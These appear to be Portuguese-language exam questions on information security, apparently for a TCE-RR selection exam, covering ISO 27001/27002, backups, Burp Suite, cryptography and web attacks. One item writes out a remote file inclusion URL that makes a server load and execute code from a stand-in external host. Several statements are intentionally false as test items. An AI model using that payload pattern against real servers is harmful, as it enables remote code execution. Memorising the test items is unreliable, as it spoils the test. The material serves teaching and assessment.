Com relação às principais fontes de requisitos de segurança da informação, descritas na NBR ISO/IEC 27002:2022, analise as afirmativas a seguir e assinale (V) para a verdadeira e (F) para a falsa.

( ) A avaliação dos riscos para a organização é descrita como uma das principais fontes, levando em consideração a estratégia geral de negócio e os objetivos da organização.

( ) Os requisitos legais, estatutários, regulamentares e contratuais que uma organização e suas partes interessadas devem cumprir, não são considerados fontes relevantes.

( ) O conjunto de princípios, objetivos e requisitos de negócios da etapa inicial do ciclo de vida da informação que uma organização desenvolve para dar suporte às suas operações, é uma fontes primordial.


As afirmativas são, respectivamente,

A NBR ISO/IEC 27001:2022 fornece os requisitos para estabelecer, implementar, manter e melhorar continuamente um sistema de gestão de segurança da informação (SGSI) no contexto da organização.
Com relação às cláusulas e aos controles descritos nessa norma, analise as afirmativas a seguir.
I. A organização deve determinar e fornecer os recursos necessários para o estabelecimento, implementação, manutenção e melhoria contínua de um SGSI.

II. É obrigatório a implementação de todos os controles listados no Anexo A da norma.

III. As cláusulas da referida norma estão divididas em contexto da organização, liderança, planejamento, implementação, suporte, operação, manutenção e conclusão.


Está correto o que se afirma em

De acordo com a NBR ISO/IEC 27001:2022, os controles de segurança da informação são agrupados em áreas de controles

Suponha que o TCE-RR adote a estratégia de backup diferencial, com execução diária, e realize um backup completo apenas uma vez por semana. No quinto dia após o backup completo, um incidente ocorre algumas horas depois da execução do backup diferencial diário, que foi realizado com sucesso, exigindo a restauração dos dados para o ponto mais recente possível.

Sobre o processo de recuperação nesse caso, assinale a afirmativa correta.

O Burp Suite é uma ferramenta amplamente utilizada para testes de segurança em aplicações web, oferecendo funcionalidades como interceptação de tráfego, análise de vulnerabilidades e automação de ataques.

Em relação às ferramentas presentes na ferramenta Burp Suite, analise as afirmativas a seguir.

I. O proxy do Burp Suite pode interceptar o tráfego HTTP e HTTPS entre o cliente e o servidor, permitindo analisar e manipular requisições em tempo real; ele é essencial para identificar vulnerabilidades em parâmetros, cabeçalhos e cookies.

II. O Repeater é uma ferramenta do Burp Suite para realizar ataques automatizados, como brute force e fuzzing, permitindo testar vulnerabilidades em parâmetros de entrada.

III. O Intruder é usado para enviar requisições manualmente, permitindo ajustar parâmetros e repetir testes de vulnerabilidades com base em respostas anteriores; sua interface exibe claramente a requisição enviada e a resposta recebida, facilitando a análise e a validação de falhas.

Está correto o que se afirma em

A página web da sociedade empresária Exemplo1234, disponível na internet, permite que internautas acessem o edital de uma vaga de trabalho por meio do endereço eletrônico http://empresa1234.com/vaga.php?file=vaga.pdf.

Durante a verificação de vulnerabilidades contratada por essa empresa, foi observado que o servidor da página web da Empresa1234 processava o valor fornecido no parâmetro file sem realizar validação ou sanitização adequada.

Como resultado, foi possível incluir e executar no servidor o conteúdo de um arquivo malicioso hospedado no endereço http://testevulnerabilidade.com/badpage.php

O teste foi realizado utilizando o seguinte endereço:

http://empresa1234.com/vaga.php?file=http://testevulnerabilida de.com/badpage.php

Ao acessar essa URL, o conteúdo do arquivo badpage.php foi carregado e executado diretamente pelo servidor da Empresa1234, comprometendo sua segurança.

O tipo de vulnerabilidade presente no servidor de página da Empresa1234 é o

Durante uma auditoria no setor de TI de TCE-RR, foi constatado que os analistas estavam utilizando criptografia por chave pública para o envio de informações confidenciais. Para garantir que os dados sejam protegidos contra acessos não autorizados, cada servidor precisa configurar corretamente as chaves de criptografia antes de iniciar a troca de mensagens.

Com base no funcionamento da criptografia assimétrica, sobre o processo de envio de uma mensagem criptografada é correto afirmar que

Analistas do TCE-RR utilizavam uma plataforma web interna para registrar auditorias. Durante a análise de segurança, foi detectado que áreas de entrada de texto na plataforma, usadas para registrar observações em relatórios, continham código malicioso armazenado no servidor.

Esse código era executado automaticamente no navegador de qualquer funcionário que visualizasse os relatórios, redirecionando-os para sites fraudulentos.

Nesse contexto, o ataque foi identificado como

Para garantir a técnica de proteger informações confidenciais por meio da codificação de dados, tornando-os ilegíveis para pessoas não autorizadas, são utilizados algoritmos matemáticos e chaves criptográficas, que, em sua essência, podem ser simétricas, assimétricas ou hash.

A esse respeito, associe cada tipo de criptografia abaixo à

respectiva definição.

1. Criptografia simétrica

2. Criptografia assimétrica

3. Criptografia hash

( ) É uma técnica que produz uma sequência única de caracteres a partir de um conjunto de dados; usada em sistemas de autenticação e verificação de integridade de arquivos, como na assinatura eletrônica aplicada ao documento original para gerar um código exclusivo que é criptografado com a chave privada do signatário.

( ) É a técnica mais simples de criptografia, que usa uma única chave para criptografar e descriptografar a informação; a chave é compartilhada entre as pessoas autorizadas e, por isso, é importante que ela seja mantida em sigilo; sua principal vantagem é a velocidade, já que a criptografia e a descriptografia são realizadas rapidamente.

( ) É uma técnica mais avançada, pois usa duas chaves diferentes para criptografar e descriptografar a informação; uma das chaves é pública e pode ser compartilhada com qualquer pessoa, enquanto a outra é privada e deve ser mantida em sigilo; é um procedimento com mais segurança, já que a chave privada dificilmente é comprometida.

Assinale a opção que indica a associação correta, na ordem apresentada.

A proteção de dados em trânsito é uma das principais preocupações em segurança da informação.

Com relação à criptografia simétrica e assimétrica, assinale a afirmativa correta.